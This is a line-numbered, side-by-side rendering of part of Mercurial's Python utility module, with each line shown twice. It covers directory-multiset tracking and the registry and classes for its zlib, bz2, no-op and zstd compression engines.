3263 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3264 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3264 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3265 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3265 By default it will flush stdout first.
3266 By default it will flush stdout first.
3266 It can be used everywhere and intentionally does not require an ui object.
3267 It can be used everywhere and intentionally does not require an ui object.
3267 Not be used in production code but very convenient while developing.
3268 Not be used in production code but very convenient while developing.
3268 '''
3269 '''
3269 if otherf:
3270 if otherf:
3270 otherf.flush()
3271 otherf.flush()
3271 f.write('%s at:\n' % msg.rstrip())
3272 f.write('%s at:\n' % msg.rstrip())
3272 for line in getstackframes(skip + 1, depth=depth):
3273 for line in getstackframes(skip + 1, depth=depth):
3273 f.write(line)
3274 f.write(line)
3274 f.flush()
3275 f.flush()
3275
3276
3276 class dirs(object):
3277 class dirs(object):
3277 '''a multiset of directory names from a dirstate or manifest'''
3278 '''a multiset of directory names from a dirstate or manifest'''
3278
3279
3279 def __init__(self, map, skip=None):
3280 def __init__(self, map, skip=None):
3280 self._dirs = {}
3281 self._dirs = {}
3281 addpath = self.addpath
3282 addpath = self.addpath
3282 if safehasattr(map, 'iteritems') and skip is not None:
3283 if safehasattr(map, 'iteritems') and skip is not None:
3283 for f, s in map.iteritems():
3284 for f, s in map.iteritems():
3284 if s[0] != skip:
3285 if s[0] != skip:
3285 addpath(f)
3286 addpath(f)
3286 else:
3287 else:
3287 for f in map:
3288 for f in map:
3288 addpath(f)
3289 addpath(f)
3289
3290
3290 def addpath(self, path):
3291 def addpath(self, path):
3291 dirs = self._dirs
3292 dirs = self._dirs
3292 for base in finddirs(path):
3293 for base in finddirs(path):
3293 if base in dirs:
3294 if base in dirs:
3294 dirs[base] += 1
3295 dirs[base] += 1
3295 return
3296 return
3296 dirs[base] = 1
3297 dirs[base] = 1
3297
3298
3298 def delpath(self, path):
3299 def delpath(self, path):
3299 dirs = self._dirs
3300 dirs = self._dirs
3300 for base in finddirs(path):
3301 for base in finddirs(path):
3301 if dirs[base] > 1:
3302 if dirs[base] > 1:
3302 dirs[base] -= 1
3303 dirs[base] -= 1
3303 return
3304 return
3304 del dirs[base]
3305 del dirs[base]
3305
3306
3306 def __iter__(self):
3307 def __iter__(self):
3307 return iter(self._dirs)
3308 return iter(self._dirs)
3308
3309
3309 def __contains__(self, d):
3310 def __contains__(self, d):
3310 return d in self._dirs
3311 return d in self._dirs
3311
3312
3312 if safehasattr(parsers, 'dirs'):
3313 if safehasattr(parsers, 'dirs'):
3313 dirs = parsers.dirs
3314 dirs = parsers.dirs
3314
3315
3315 def finddirs(path):
3316 def finddirs(path):
3316 pos = path.rfind('/')
3317 pos = path.rfind('/')
3317 while pos != -1:
3318 while pos != -1:
3318 yield path[:pos]
3319 yield path[:pos]
3319 pos = path.rfind('/', 0, pos)
3320 pos = path.rfind('/', 0, pos)
3320
3321
3321 # compression code
3322 # compression code
3322
3323
3323 SERVERROLE = 'server'
3324 SERVERROLE = 'server'
3324 CLIENTROLE = 'client'
3325 CLIENTROLE = 'client'
3325
3326
3326 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3327 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3327 (u'name', u'serverpriority',
3328 (u'name', u'serverpriority',
3328 u'clientpriority'))
3329 u'clientpriority'))
3329
3330
3330 class compressormanager(object):
3331 class compressormanager(object):
3331 """Holds registrations of various compression engines.
3332 """Holds registrations of various compression engines.
3332
3333
3333 This class essentially abstracts the differences between compression
3334 This class essentially abstracts the differences between compression
3334 engines to allow new compression formats to be added easily, possibly from
3335 engines to allow new compression formats to be added easily, possibly from
3335 extensions.
3336 extensions.
3336
3337
3337 Compressors are registered against the global instance by calling its
3338 Compressors are registered against the global instance by calling its
3338 ``register()`` method.
3339 ``register()`` method.
3339 """
3340 """
3340 def __init__(self):
3341 def __init__(self):
3341 self._engines = {}
3342 self._engines = {}
3342 # Bundle spec human name to engine name.
3343 # Bundle spec human name to engine name.
3343 self._bundlenames = {}
3344 self._bundlenames = {}
3344 # Internal bundle identifier to engine name.
3345 # Internal bundle identifier to engine name.
3345 self._bundletypes = {}
3346 self._bundletypes = {}
3346 # Revlog header to engine name.
3347 # Revlog header to engine name.
3347 self._revlogheaders = {}
3348 self._revlogheaders = {}
3348 # Wire proto identifier to engine name.
3349 # Wire proto identifier to engine name.
3349 self._wiretypes = {}
3350 self._wiretypes = {}
3350
3351
3351 def __getitem__(self, key):
3352 def __getitem__(self, key):
3352 return self._engines[key]
3353 return self._engines[key]
3353
3354
3354 def __contains__(self, key):
3355 def __contains__(self, key):
3355 return key in self._engines
3356 return key in self._engines
3356
3357
3357 def __iter__(self):
3358 def __iter__(self):
3358 return iter(self._engines.keys())
3359 return iter(self._engines.keys())
3359
3360
3360 def register(self, engine):
3361 def register(self, engine):
3361 """Register a compression engine with the manager.
3362 """Register a compression engine with the manager.
3362
3363
3363 The argument must be a ``compressionengine`` instance.
3364 The argument must be a ``compressionengine`` instance.
3364 """
3365 """
3365 if not isinstance(engine, compressionengine):
3366 if not isinstance(engine, compressionengine):
3366 raise ValueError(_('argument must be a compressionengine'))
3367 raise ValueError(_('argument must be a compressionengine'))
3367
3368
3368 name = engine.name()
3369 name = engine.name()
3369
3370
3370 if name in self._engines:
3371 if name in self._engines:
3371 raise error.Abort(_('compression engine %s already registered') %
3372 raise error.Abort(_('compression engine %s already registered') %
3372 name)
3373 name)
3373
3374
3374 bundleinfo = engine.bundletype()
3375 bundleinfo = engine.bundletype()
3375 if bundleinfo:
3376 if bundleinfo:
3376 bundlename, bundletype = bundleinfo
3377 bundlename, bundletype = bundleinfo
3377
3378
3378 if bundlename in self._bundlenames:
3379 if bundlename in self._bundlenames:
3379 raise error.Abort(_('bundle name %s already registered') %
3380 raise error.Abort(_('bundle name %s already registered') %
3380 bundlename)
3381 bundlename)
3381 if bundletype in self._bundletypes:
3382 if bundletype in self._bundletypes:
3382 raise error.Abort(_('bundle type %s already registered by %s') %
3383 raise error.Abort(_('bundle type %s already registered by %s') %
3383 (bundletype, self._bundletypes[bundletype]))
3384 (bundletype, self._bundletypes[bundletype]))
3384
3385
3385 # No external facing name declared.
3386 # No external facing name declared.
3386 if bundlename:
3387 if bundlename:
3387 self._bundlenames[bundlename] = name
3388 self._bundlenames[bundlename] = name
3388
3389
3389 self._bundletypes[bundletype] = name
3390 self._bundletypes[bundletype] = name
3390
3391
3391 wiresupport = engine.wireprotosupport()
3392 wiresupport = engine.wireprotosupport()
3392 if wiresupport:
3393 if wiresupport:
3393 wiretype = wiresupport.name
3394 wiretype = wiresupport.name
3394 if wiretype in self._wiretypes:
3395 if wiretype in self._wiretypes:
3395 raise error.Abort(_('wire protocol compression %s already '
3396 raise error.Abort(_('wire protocol compression %s already '
3396 'registered by %s') %
3397 'registered by %s') %
3397 (wiretype, self._wiretypes[wiretype]))
3398 (wiretype, self._wiretypes[wiretype]))
3398
3399
3399 self._wiretypes[wiretype] = name
3400 self._wiretypes[wiretype] = name
3400
3401
3401 revlogheader = engine.revlogheader()
3402 revlogheader = engine.revlogheader()
3402 if revlogheader and revlogheader in self._revlogheaders:
3403 if revlogheader and revlogheader in self._revlogheaders:
3403 raise error.Abort(_('revlog header %s already registered by %s') %
3404 raise error.Abort(_('revlog header %s already registered by %s') %
3404 (revlogheader, self._revlogheaders[revlogheader]))
3405 (revlogheader, self._revlogheaders[revlogheader]))
3405
3406
3406 if revlogheader:
3407 if revlogheader:
3407 self._revlogheaders[revlogheader] = name
3408 self._revlogheaders[revlogheader] = name
3408
3409
3409 self._engines[name] = engine
3410 self._engines[name] = engine
3410
3411
3411 @property
3412 @property
3412 def supportedbundlenames(self):
3413 def supportedbundlenames(self):
3413 return set(self._bundlenames.keys())
3414 return set(self._bundlenames.keys())
3414
3415
3415 @property
3416 @property
3416 def supportedbundletypes(self):
3417 def supportedbundletypes(self):
3417 return set(self._bundletypes.keys())
3418 return set(self._bundletypes.keys())
3418
3419
3419 def forbundlename(self, bundlename):
3420 def forbundlename(self, bundlename):
3420 """Obtain a compression engine registered to a bundle name.
3421 """Obtain a compression engine registered to a bundle name.
3421
3422
3422 Will raise KeyError if the bundle type isn't registered.
3423 Will raise KeyError if the bundle type isn't registered.
3423
3424
3424 Will abort if the engine is known but not available.
3425 Will abort if the engine is known but not available.
3425 """
3426 """
3426 engine = self._engines[self._bundlenames[bundlename]]
3427 engine = self._engines[self._bundlenames[bundlename]]
3427 if not engine.available():
3428 if not engine.available():
3428 raise error.Abort(_('compression engine %s could not be loaded') %
3429 raise error.Abort(_('compression engine %s could not be loaded') %
3429 engine.name())
3430 engine.name())
3430 return engine
3431 return engine
3431
3432
3432 def forbundletype(self, bundletype):
3433 def forbundletype(self, bundletype):
3433 """Obtain a compression engine registered to a bundle type.
3434 """Obtain a compression engine registered to a bundle type.
3434
3435
3435 Will raise KeyError if the bundle type isn't registered.
3436 Will raise KeyError if the bundle type isn't registered.
3436
3437
3437 Will abort if the engine is known but not available.
3438 Will abort if the engine is known but not available.
3438 """
3439 """
3439 engine = self._engines[self._bundletypes[bundletype]]
3440 engine = self._engines[self._bundletypes[bundletype]]
3440 if not engine.available():
3441 if not engine.available():
3441 raise error.Abort(_('compression engine %s could not be loaded') %
3442 raise error.Abort(_('compression engine %s could not be loaded') %
3442 engine.name())
3443 engine.name())
3443 return engine
3444 return engine
3444
3445
3445 def supportedwireengines(self, role, onlyavailable=True):
3446 def supportedwireengines(self, role, onlyavailable=True):
3446 """Obtain compression engines that support the wire protocol.
3447 """Obtain compression engines that support the wire protocol.
3447
3448
3448 Returns a list of engines in prioritized order, most desired first.
3449 Returns a list of engines in prioritized order, most desired first.
3449
3450
3450 If ``onlyavailable`` is set, filter out engines that can't be
3451 If ``onlyavailable`` is set, filter out engines that can't be
3451 loaded.
3452 loaded.
3452 """
3453 """
3453 assert role in (SERVERROLE, CLIENTROLE)
3454 assert role in (SERVERROLE, CLIENTROLE)
3454
3455
3455 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3456 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3456
3457
3457 engines = [self._engines[e] for e in self._wiretypes.values()]
3458 engines = [self._engines[e] for e in self._wiretypes.values()]
3458 if onlyavailable:
3459 if onlyavailable:
3459 engines = [e for e in engines if e.available()]
3460 engines = [e for e in engines if e.available()]
3460
3461
3461 def getkey(e):
3462 def getkey(e):
3462 # Sort first by priority, highest first. In case of tie, sort
3463 # Sort first by priority, highest first. In case of tie, sort
3463 # alphabetically. This is arbitrary, but ensures output is
3464 # alphabetically. This is arbitrary, but ensures output is
3464 # stable.
3465 # stable.
3465 w = e.wireprotosupport()
3466 w = e.wireprotosupport()
3466 return -1 * getattr(w, attr), w.name
3467 return -1 * getattr(w, attr), w.name
3467
3468
3468 return list(sorted(engines, key=getkey))
3469 return list(sorted(engines, key=getkey))
3469
3470
3470 def forwiretype(self, wiretype):
3471 def forwiretype(self, wiretype):
3471 engine = self._engines[self._wiretypes[wiretype]]
3472 engine = self._engines[self._wiretypes[wiretype]]
3472 if not engine.available():
3473 if not engine.available():
3473 raise error.Abort(_('compression engine %s could not be loaded') %
3474 raise error.Abort(_('compression engine %s could not be loaded') %
3474 engine.name())
3475 engine.name())
3475 return engine
3476 return engine
3476
3477
3477 def forrevlogheader(self, header):
3478 def forrevlogheader(self, header):
3478 """Obtain a compression engine registered to a revlog header.
3479 """Obtain a compression engine registered to a revlog header.
3479
3480
3480 Will raise KeyError if the revlog header value isn't registered.
3481 Will raise KeyError if the revlog header value isn't registered.
3481 """
3482 """
3482 return self._engines[self._revlogheaders[header]]
3483 return self._engines[self._revlogheaders[header]]
3483
3484
3484 compengines = compressormanager()
3485 compengines = compressormanager()
3485
3486
3486 class compressionengine(object):
3487 class compressionengine(object):
3487 """Base class for compression engines.
3488 """Base class for compression engines.
3488
3489
3489 Compression engines must implement the interface defined by this class.
3490 Compression engines must implement the interface defined by this class.
3490 """
3491 """
3491 def name(self):
3492 def name(self):
3492 """Returns the name of the compression engine.
3493 """Returns the name of the compression engine.
3493
3494
3494 This is the key the engine is registered under.
3495 This is the key the engine is registered under.
3495
3496
3496 This method must be implemented.
3497 This method must be implemented.
3497 """
3498 """
3498 raise NotImplementedError()
3499 raise NotImplementedError()
3499
3500
3500 def available(self):
3501 def available(self):
3501 """Whether the compression engine is available.
3502 """Whether the compression engine is available.
3502
3503
3503 The intent of this method is to allow optional compression engines
3504 The intent of this method is to allow optional compression engines
3504 that may not be available in all installations (such as engines relying
3505 that may not be available in all installations (such as engines relying
3505 on C extensions that may not be present).
3506 on C extensions that may not be present).
3506 """
3507 """
3507 return True
3508 return True
3508
3509
3509 def bundletype(self):
3510 def bundletype(self):
3510 """Describes bundle identifiers for this engine.
3511 """Describes bundle identifiers for this engine.
3511
3512
3512 If this compression engine isn't supported for bundles, returns None.
3513 If this compression engine isn't supported for bundles, returns None.
3513
3514
3514 If this engine can be used for bundles, returns a 2-tuple of strings of
3515 If this engine can be used for bundles, returns a 2-tuple of strings of
3515 the user-facing "bundle spec" compression name and an internal
3516 the user-facing "bundle spec" compression name and an internal
3516 identifier used to denote the compression format within bundles. To
3517 identifier used to denote the compression format within bundles. To
3517 exclude the name from external usage, set the first element to ``None``.
3518 exclude the name from external usage, set the first element to ``None``.
3518
3519
3519 If bundle compression is supported, the class must also implement
3520 If bundle compression is supported, the class must also implement
3520 ``compressstream`` and `decompressorreader``.
3521 ``compressstream`` and `decompressorreader``.
3521
3522
3522 The docstring of this method is used in the help system to tell users
3523 The docstring of this method is used in the help system to tell users
3523 about this engine.
3524 about this engine.
3524 """
3525 """
3525 return None
3526 return None
3526
3527
3527 def wireprotosupport(self):
3528 def wireprotosupport(self):
3528 """Declare support for this compression format on the wire protocol.
3529 """Declare support for this compression format on the wire protocol.
3529
3530
3530 If this compression engine isn't supported for compressing wire
3531 If this compression engine isn't supported for compressing wire
3531 protocol payloads, returns None.
3532 protocol payloads, returns None.
3532
3533
3533 Otherwise, returns ``compenginewireprotosupport`` with the following
3534 Otherwise, returns ``compenginewireprotosupport`` with the following
3534 fields:
3535 fields:
3535
3536
3536 * String format identifier
3537 * String format identifier
3537 * Integer priority for the server
3538 * Integer priority for the server
3538 * Integer priority for the client
3539 * Integer priority for the client
3539
3540
3540 The integer priorities are used to order the advertisement of format
3541 The integer priorities are used to order the advertisement of format
3541 support by server and client. The highest integer is advertised
3542 support by server and client. The highest integer is advertised
3542 first. Integers with non-positive values aren't advertised.
3543 first. Integers with non-positive values aren't advertised.
3543
3544
3544 The priority values are somewhat arbitrary and only used for default
3545 The priority values are somewhat arbitrary and only used for default
3545 ordering. The relative order can be changed via config options.
3546 ordering. The relative order can be changed via config options.
3546
3547
3547 If wire protocol compression is supported, the class must also implement
3548 If wire protocol compression is supported, the class must also implement
3548 ``compressstream`` and ``decompressorreader``.
3549 ``compressstream`` and ``decompressorreader``.
3549 """
3550 """
3550 return None
3551 return None
3551
3552
3552 def revlogheader(self):
3553 def revlogheader(self):
3553 """Header added to revlog chunks that identifies this engine.
3554 """Header added to revlog chunks that identifies this engine.
3554
3555
3555 If this engine can be used to compress revlogs, this method should
3556 If this engine can be used to compress revlogs, this method should
3556 return the bytes used to identify chunks compressed with this engine.
3557 return the bytes used to identify chunks compressed with this engine.
3557 Else, the method should return ``None`` to indicate it does not
3558 Else, the method should return ``None`` to indicate it does not
3558 participate in revlog compression.
3559 participate in revlog compression.
3559 """
3560 """
3560 return None
3561 return None
3561
3562
3562 def compressstream(self, it, opts=None):
3563 def compressstream(self, it, opts=None):
3563 """Compress an iterator of chunks.
3564 """Compress an iterator of chunks.
3564
3565
3565 The method receives an iterator (ideally a generator) of chunks of
3566 The method receives an iterator (ideally a generator) of chunks of
3566 bytes to be compressed. It returns an iterator (ideally a generator)
3567 bytes to be compressed. It returns an iterator (ideally a generator)
3567 of bytes of chunks representing the compressed output.
3568 of bytes of chunks representing the compressed output.
3568
3569
3569 Optionally accepts an argument defining how to perform compression.
3570 Optionally accepts an argument defining how to perform compression.
3570 Each engine treats this argument differently.
3571 Each engine treats this argument differently.
3571 """
3572 """
3572 raise NotImplementedError()
3573 raise NotImplementedError()
3573
3574
3574 def decompressorreader(self, fh):
3575 def decompressorreader(self, fh):
3575 """Perform decompression on a file object.
3576 """Perform decompression on a file object.
3576
3577
3577 Argument is an object with a ``read(size)`` method that returns
3578 Argument is an object with a ``read(size)`` method that returns
3578 compressed data. Return value is an object with a ``read(size)`` that
3579 compressed data. Return value is an object with a ``read(size)`` that
3579 returns uncompressed data.
3580 returns uncompressed data.
3580 """
3581 """
3581 raise NotImplementedError()
3582 raise NotImplementedError()
3582
3583
3583 def revlogcompressor(self, opts=None):
3584 def revlogcompressor(self, opts=None):
3584 """Obtain an object that can be used to compress revlog entries.
3585 """Obtain an object that can be used to compress revlog entries.
3585
3586
3586 The object has a ``compress(data)`` method that compresses binary
3587 The object has a ``compress(data)`` method that compresses binary
3587 data. This method returns compressed binary data or ``None`` if
3588 data. This method returns compressed binary data or ``None`` if
3588 the data could not be compressed (too small, not compressible, etc).
3589 the data could not be compressed (too small, not compressible, etc).
3589 The returned data should have a header uniquely identifying this
3590 The returned data should have a header uniquely identifying this
3590 compression format so decompression can be routed to this engine.
3591 compression format so decompression can be routed to this engine.
3591 This header should be identified by the ``revlogheader()`` return
3592 This header should be identified by the ``revlogheader()`` return
3592 value.
3593 value.
3593
3594
3594 The object has a ``decompress(data)`` method that decompresses
3595 The object has a ``decompress(data)`` method that decompresses
3595 data. The method will only be called if ``data`` begins with
3596 data. The method will only be called if ``data`` begins with
3596 ``revlogheader()``. The method should return the raw, uncompressed
3597 ``revlogheader()``. The method should return the raw, uncompressed
3597 data or raise a ``RevlogError``.
3598 data or raise a ``RevlogError``.
3598
3599
3599 The object is reusable but is not thread safe.
3600 The object is reusable but is not thread safe.
3600 """
3601 """
3601 raise NotImplementedError()
3602 raise NotImplementedError()
3602
3603
3603 class _zlibengine(compressionengine):
3604 class _zlibengine(compressionengine):
3604 def name(self):
3605 def name(self):
3605 return 'zlib'
3606 return 'zlib'
3606
3607
3607 def bundletype(self):
3608 def bundletype(self):
3608 """zlib compression using the DEFLATE algorithm.
3609 """zlib compression using the DEFLATE algorithm.
3609
3610
3610 All Mercurial clients should support this format. The compression
3611 All Mercurial clients should support this format. The compression
3611 algorithm strikes a reasonable balance between compression ratio
3612 algorithm strikes a reasonable balance between compression ratio
3612 and size.
3613 and size.
3613 """
3614 """
3614 return 'gzip', 'GZ'
3615 return 'gzip', 'GZ'
3615
3616
3616 def wireprotosupport(self):
3617 def wireprotosupport(self):
3617 return compewireprotosupport('zlib', 20, 20)
3618 return compewireprotosupport('zlib', 20, 20)
3618
3619
3619 def revlogheader(self):
3620 def revlogheader(self):
3620 return 'x'
3621 return 'x'
3621
3622
3622 def compressstream(self, it, opts=None):
3623 def compressstream(self, it, opts=None):
3623 opts = opts or {}
3624 opts = opts or {}
3624
3625
3625 z = zlib.compressobj(opts.get('level', -1))
3626 z = zlib.compressobj(opts.get('level', -1))
3626 for chunk in it:
3627 for chunk in it:
3627 data = z.compress(chunk)
3628 data = z.compress(chunk)
3628 # Not all calls to compress emit data. It is cheaper to inspect
3629 # Not all calls to compress emit data. It is cheaper to inspect
3629 # here than to feed empty chunks through generator.
3630 # here than to feed empty chunks through generator.
3630 if data:
3631 if data:
3631 yield data
3632 yield data
3632
3633
3633 yield z.flush()
3634 yield z.flush()
3634
3635
3635 def decompressorreader(self, fh):
3636 def decompressorreader(self, fh):
3636 def gen():
3637 def gen():
3637 d = zlib.decompressobj()
3638 d = zlib.decompressobj()
3638 for chunk in filechunkiter(fh):
3639 for chunk in filechunkiter(fh):
3639 while chunk:
3640 while chunk:
3640 # Limit output size to limit memory.
3641 # Limit output size to limit memory.
3641 yield d.decompress(chunk, 2 ** 18)
3642 yield d.decompress(chunk, 2 ** 18)
3642 chunk = d.unconsumed_tail
3643 chunk = d.unconsumed_tail
3643
3644
3644 return chunkbuffer(gen())
3645 return chunkbuffer(gen())
3645
3646
3646 class zlibrevlogcompressor(object):
3647 class zlibrevlogcompressor(object):
3647 def compress(self, data):
3648 def compress(self, data):
3648 insize = len(data)
3649 insize = len(data)
3649 # Caller handles empty input case.
3650 # Caller handles empty input case.
3650 assert insize > 0
3651 assert insize > 0
3651
3652
3652 if insize < 44:
3653 if insize < 44:
3653 return None
3654 return None
3654
3655
3655 elif insize <= 1000000:
3656 elif insize <= 1000000:
3656 compressed = zlib.compress(data)
3657 compressed = zlib.compress(data)
3657 if len(compressed) < insize:
3658 if len(compressed) < insize:
3658 return compressed
3659 return compressed
3659 return None
3660 return None
3660
3661
3661 # zlib makes an internal copy of the input buffer, doubling
3662 # zlib makes an internal copy of the input buffer, doubling
3662 # memory usage for large inputs. So do streaming compression
3663 # memory usage for large inputs. So do streaming compression
3663 # on large inputs.
3664 # on large inputs.
3664 else:
3665 else:
3665 z = zlib.compressobj()
3666 z = zlib.compressobj()
3666 parts = []
3667 parts = []
3667 pos = 0
3668 pos = 0
3668 while pos < insize:
3669 while pos < insize:
3669 pos2 = pos + 2**20
3670 pos2 = pos + 2**20
3670 parts.append(z.compress(data[pos:pos2]))
3671 parts.append(z.compress(data[pos:pos2]))
3671 pos = pos2
3672 pos = pos2
3672 parts.append(z.flush())
3673 parts.append(z.flush())
3673
3674
3674 if sum(map(len, parts)) < insize:
3675 if sum(map(len, parts)) < insize:
3675 return ''.join(parts)
3676 return ''.join(parts)
3676 return None
3677 return None
3677
3678
3678 def decompress(self, data):
3679 def decompress(self, data):
3679 try:
3680 try:
3680 return zlib.decompress(data)
3681 return zlib.decompress(data)
3681 except zlib.error as e:
3682 except zlib.error as e:
3682 raise error.RevlogError(_('revlog decompress error: %s') %
3683 raise error.RevlogError(_('revlog decompress error: %s') %
3683 stringutil.forcebytestr(e))
3684 stringutil.forcebytestr(e))
3684
3685
3685 def revlogcompressor(self, opts=None):
3686 def revlogcompressor(self, opts=None):
3686 return self.zlibrevlogcompressor()
3687 return self.zlibrevlogcompressor()
3687
3688
3688 compengines.register(_zlibengine())
3689 compengines.register(_zlibengine())
3689
3690
3690 class _bz2engine(compressionengine):
3691 class _bz2engine(compressionengine):
3691 def name(self):
3692 def name(self):
3692 return 'bz2'
3693 return 'bz2'
3693
3694
3694 def bundletype(self):
3695 def bundletype(self):
3695 """An algorithm that produces smaller bundles than ``gzip``.
3696 """An algorithm that produces smaller bundles than ``gzip``.
3696
3697
3697 All Mercurial clients should support this format.
3698 All Mercurial clients should support this format.
3698
3699
3699 This engine will likely produce smaller bundles than ``gzip`` but
3700 This engine will likely produce smaller bundles than ``gzip`` but
3700 will be significantly slower, both during compression and
3701 will be significantly slower, both during compression and
3701 decompression.
3702 decompression.
3702
3703
3703 If available, the ``zstd`` engine can yield similar or better
3704 If available, the ``zstd`` engine can yield similar or better
3704 compression at much higher speeds.
3705 compression at much higher speeds.
3705 """
3706 """
3706 return 'bzip2', 'BZ'
3707 return 'bzip2', 'BZ'
3707
3708
3708 # We declare a protocol name but don't advertise by default because
3709 # We declare a protocol name but don't advertise by default because
3709 # it is slow.
3710 # it is slow.
3710 def wireprotosupport(self):
3711 def wireprotosupport(self):
3711 return compewireprotosupport('bzip2', 0, 0)
3712 return compewireprotosupport('bzip2', 0, 0)
3712
3713
3713 def compressstream(self, it, opts=None):
3714 def compressstream(self, it, opts=None):
3714 opts = opts or {}
3715 opts = opts or {}
3715 z = bz2.BZ2Compressor(opts.get('level', 9))
3716 z = bz2.BZ2Compressor(opts.get('level', 9))
3716 for chunk in it:
3717 for chunk in it:
3717 data = z.compress(chunk)
3718 data = z.compress(chunk)
3718 if data:
3719 if data:
3719 yield data
3720 yield data
3720
3721
3721 yield z.flush()
3722 yield z.flush()
3722
3723
3723 def decompressorreader(self, fh):
3724 def decompressorreader(self, fh):
3724 def gen():
3725 def gen():
3725 d = bz2.BZ2Decompressor()
3726 d = bz2.BZ2Decompressor()
3726 for chunk in filechunkiter(fh):
3727 for chunk in filechunkiter(fh):
3727 yield d.decompress(chunk)
3728 yield d.decompress(chunk)
3728
3729
3729 return chunkbuffer(gen())
3730 return chunkbuffer(gen())
3730
3731
3731 compengines.register(_bz2engine())
3732 compengines.register(_bz2engine())
3732
3733
3733 class _truncatedbz2engine(compressionengine):
3734 class _truncatedbz2engine(compressionengine):
3734 def name(self):
3735 def name(self):
3735 return 'bz2truncated'
3736 return 'bz2truncated'
3736
3737
3737 def bundletype(self):
3738 def bundletype(self):
3738 return None, '_truncatedBZ'
3739 return None, '_truncatedBZ'
3739
3740
3740 # We don't implement compressstream because it is hackily handled elsewhere.
3741 # We don't implement compressstream because it is hackily handled elsewhere.
3741
3742
3742 def decompressorreader(self, fh):
3743 def decompressorreader(self, fh):
3743 def gen():
3744 def gen():
3744 # The input stream doesn't have the 'BZ' header. So add it back.
3745 # The input stream doesn't have the 'BZ' header. So add it back.
3745 d = bz2.BZ2Decompressor()
3746 d = bz2.BZ2Decompressor()
3746 d.decompress('BZ')
3747 d.decompress('BZ')
3747 for chunk in filechunkiter(fh):
3748 for chunk in filechunkiter(fh):
3748 yield d.decompress(chunk)
3749 yield d.decompress(chunk)
3749
3750
3750 return chunkbuffer(gen())
3751 return chunkbuffer(gen())
3751
3752
3752 compengines.register(_truncatedbz2engine())
3753 compengines.register(_truncatedbz2engine())
3753
3754
3754 class _noopengine(compressionengine):
3755 class _noopengine(compressionengine):
3755 def name(self):
3756 def name(self):
3756 return 'none'
3757 return 'none'
3757
3758
3758 def bundletype(self):
3759 def bundletype(self):
3759 """No compression is performed.
3760 """No compression is performed.
3760
3761
3761 Use this compression engine to explicitly disable compression.
3762 Use this compression engine to explicitly disable compression.
3762 """
3763 """
3763 return 'none', 'UN'
3764 return 'none', 'UN'
3764
3765
3765 # Clients always support uncompressed payloads. Servers don't because
3766 # Clients always support uncompressed payloads. Servers don't because
3766 # unless you are on a fast network, uncompressed payloads can easily
3767 # unless you are on a fast network, uncompressed payloads can easily
3767 # saturate your network pipe.
3768 # saturate your network pipe.
3768 def wireprotosupport(self):
3769 def wireprotosupport(self):
3769 return compewireprotosupport('none', 0, 10)
3770 return compewireprotosupport('none', 0, 10)
3770
3771
3771 # We don't implement revlogheader because it is handled specially
3772 # We don't implement revlogheader because it is handled specially
3772 # in the revlog class.
3773 # in the revlog class.
3773
3774
3774 def compressstream(self, it, opts=None):
3775 def compressstream(self, it, opts=None):
3775 return it
3776 return it
3776
3777
3777 def decompressorreader(self, fh):
3778 def decompressorreader(self, fh):
3778 return fh
3779 return fh
3779
3780
3780 class nooprevlogcompressor(object):
3781 class nooprevlogcompressor(object):
3781 def compress(self, data):
3782 def compress(self, data):
3782 return None
3783 return None
3783
3784
3784 def revlogcompressor(self, opts=None):
3785 def revlogcompressor(self, opts=None):
3785 return self.nooprevlogcompressor()
3786 return self.nooprevlogcompressor()
3786
3787
3787 compengines.register(_noopengine())
3788 compengines.register(_noopengine())
3788
3789
3789 class _zstdengine(compressionengine):
3790 class _zstdengine(compressionengine):
3790 def name(self):
3791 def name(self):
3791 return 'zstd'
3792 return 'zstd'
3792
3793
3793 @propertycache
3794 @propertycache
3794 def _module(self):
3795 def _module(self):
3795 # Not all installs have the zstd module available. So defer importing
3796 # Not all installs have the zstd module available. So defer importing
3796 # until first access.
3797 # until first access.
3797 try:
3798 try:
3798 from . import zstd
3799 from . import zstd
3799 # Force delayed import.
3800 # Force delayed import.
3800 zstd.__version__
3801 zstd.__version__
3801 return zstd
3802 return zstd
3802 except ImportError:
3803 except ImportError:
3803 return None
3804 return None
3804
3805
3805 def available(self):
3806 def available(self):
3806 return bool(self._module)
3807 return bool(self._module)
3807
3808
3808 def bundletype(self):
3809 def bundletype(self):
3809 """A modern compression algorithm that is fast and highly flexible.
3810 """A modern compression algorithm that is fast and highly flexible.
3810
3811
3811 Only supported by Mercurial 4.1 and newer clients.
3812 Only supported by Mercurial 4.1 and newer clients.
3812
3813
3813 With the default settings, zstd compression is both faster and yields
3814 With the default settings, zstd compression is both faster and yields
3814 better compression than ``gzip``. It also frequently yields better
3815 better compression than ``gzip``. It also frequently yields better
3815 compression than ``bzip2`` while operating at much higher speeds.
3816 compression than ``bzip2`` while operating at much higher speeds.
3816
3817
3817 If this engine is available and backwards compatibility is not a
3818 If this engine is available and backwards compatibility is not a
3818 concern, it is likely the best available engine.
3819 concern, it is likely the best available engine.
3819 """
3820 """
3820 return 'zstd', 'ZS'
3821 return 'zstd', 'ZS'
3821
3822
3822 def wireprotosupport(self):
3823 def wireprotosupport(self):
3823 return compewireprotosupport('zstd', 50, 50)
3824 return compewireprotosupport('zstd', 50, 50)
3824
3825
3825 def revlogheader(self):
3826 def revlogheader(self):
3826 return '\x28'
3827 return '\x28'
3827
3828
3828 def compressstream(self, it, opts=None):
3829 def compressstream(self, it, opts=None):
3829 opts = opts or {}
3830 opts = opts or {}
3830 # zstd level 3 is almost always significantly faster than zlib
3831 # zstd level 3 is almost always significantly faster than zlib
3831 # while providing no worse compression. It strikes a good balance
3832 # while providing no worse compression. It strikes a good balance
3832 # between speed and compression.
3833 # between speed and compression.
3833 level = opts.get('level', 3)
3834 level = opts.get('level', 3)
3834
3835
3835 zstd = self._module
3836 zstd = self._module
3836 z = zstd.ZstdCompressor(level=level).compressobj()
3837 z = zstd.ZstdCompressor(level=level).compressobj()
3837 for chunk in it:
3838 for chunk in it:
3838 data = z.compress(chunk)
3839 data = z.compress(chunk)
3839 if data:
3840 if data:
3840 yield data
3841 yield data
3841
3842
3842 yield z.flush()
3843 yield z.flush()
3843
3844
3844 def decompressorreader(self, fh):
